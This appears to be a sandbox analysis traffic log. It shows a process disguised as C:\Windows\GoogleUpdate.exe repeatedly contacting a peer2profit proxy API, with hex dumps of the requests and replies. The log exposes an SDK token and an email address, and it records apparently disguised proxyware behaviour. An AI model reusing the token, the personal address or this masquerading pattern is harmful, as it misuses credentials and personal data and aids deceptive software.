2023-01-04 15:49:13 UTC	37	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:13 UTC	37	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:13 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f776f899259-FRA
2023-01-04 15:49:13 UTC	37	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.4	49873	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:14 UTC	37	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:14 UTC	38	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:14 UTC	38	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:14 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f7ecb29bbc2-FRA
2023-01-04 15:49:14 UTC	38	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.4	49879	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:16 UTC	38	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:16 UTC	38	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:16 UTC	38	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:16 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f8799e09b46-FRA
2023-01-04 15:49:16 UTC	39	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.4	49883	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:17 UTC	39	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:17 UTC	39	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:17 UTC	39	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:17 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f8f594b9085-FRA
2023-01-04 15:49:17 UTC	39	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.4	49887	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:18 UTC	39	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:18 UTC	40	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:18 UTC	40	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:18 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f96586e9188-FRA
2023-01-04 15:49:18 UTC	40	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.4	49889	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:18 UTC	40	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:18 UTC	40	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:19 UTC	40	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:19 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f984a232ba4-FRA
2023-01-04 15:49:19 UTC	41	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49715	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:23 UTC	4	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:23 UTC	4	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:23 UTC	4	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:23 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451e3d3aa22bf5-FRA
2023-01-04 15:48:23 UTC	4	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.4	49893	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:19 UTC	41	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:19 UTC	41	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:19 UTC	41	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:19 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f9c6fc4bb9d-FRA
2023-01-04 15:49:19 UTC	41	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.4	49895	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:19 UTC	41	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:19 UTC	42	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:19 UTC	42	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:19 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f9e5fbd9a0c-FRA
2023-01-04 15:49:19 UTC	42	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.4	49898	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:20 UTC	42	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:20 UTC	42	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:20 UTC	43	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:20 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451fa10d992bbb-FRA
2023-01-04 15:49:20 UTC	43	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.4	49900	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:20 UTC	43	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:20 UTC	43	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:20 UTC	43	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:20 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451fa3d8072c71-FRA
2023-01-04 15:49:20 UTC	43	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.4	49903	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:20 UTC	44	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:20 UTC	44	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:21 UTC	44	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:21 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451fa6088f2c46-FRA
